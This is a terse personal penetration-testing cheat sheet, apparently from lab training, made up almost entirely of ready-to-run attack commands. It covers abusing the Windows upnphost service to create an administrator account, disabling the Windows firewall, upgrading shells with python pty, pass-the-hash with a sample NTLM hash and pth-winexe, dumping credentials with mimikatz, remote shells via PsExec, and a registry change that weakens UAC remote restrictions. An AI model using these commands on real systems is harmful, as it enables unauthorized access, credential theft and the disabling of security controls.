# keepnote
**file transfer;**
{% embed url="" %}
**Winpriv check:**
**Local Privilege Escalation Abusing Misconfiguration Service (upnphost):**
> accesschk.exe -uwcqv "Authenticated Users" */accepteula accesschk-xp.exe -uwcqv "Authenticated Users"* /accepteula
>
> accesschk.exe -ucqv upnphost\
> sc config upnphost depend= ""\
> sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"
>
> sc stop upnphost sc start upnphost
**File Transfer via FTP**
ftp > binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
cadaver
**Python Interactive Shell**
pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
**Disable Windows firewall on newer versions:**\
`NetSh Advfirewall set allprofiles state off`
**Disable windows firewall on older windows:**\
`netsh firewall set opmode disable`
**Referans**
priv esc linux - hacking articler (abuse path variable.)
priv esc - cronjob
priv esc - windows - servisler - sc
## PtH
`pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe`
#### via sysinternals tools and mimikatz
* **PtH get user ntlm hash. (via RDP, MSF or other)**
```
mimikatz# privilege::debug
mimikatz# privilege::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}
```
then open new cmd. you can run command via psexec.
`windows> PsExec.exe \\{IP} cmd`
Tip: General usage with password:
`PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd`
if got "Couldn't access otherComputer: Access is denied." ERROR:
run the following command at target system:
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`